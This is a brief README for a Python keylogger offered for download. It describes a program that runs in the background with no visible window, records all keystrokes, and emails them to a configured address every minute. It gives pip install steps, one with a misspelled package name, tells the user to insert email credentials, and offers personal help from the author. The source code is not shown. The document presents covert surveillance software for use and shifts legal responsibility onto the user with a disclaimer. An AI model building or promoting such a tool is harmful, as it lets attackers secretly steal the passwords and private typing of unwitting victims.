This is a keylogger program made in python language.
When you run this program there will be no console appering in your computer, the program will be running in background first it will read all the keystrokes from keyboard and than in every 1 minute i.e 60sec it will send the recorded keystrokes to the entered email.
pip install keyboard
pip install smptlib
pip install threaded
Download given source code
*Before running make some modifications*
1.) Don't forget to change email id and password in the file.
2.) If you want to change the time for sending the recorded mail you can too change that also.
NOTE : In case of any help you can contact my twitter_id https://twitter.com/iampratham_U, i am happy to help you.
If you use this program in any manner that is against law than you only are responsible for the same.
Any query or Suggestion will we always be appreciated.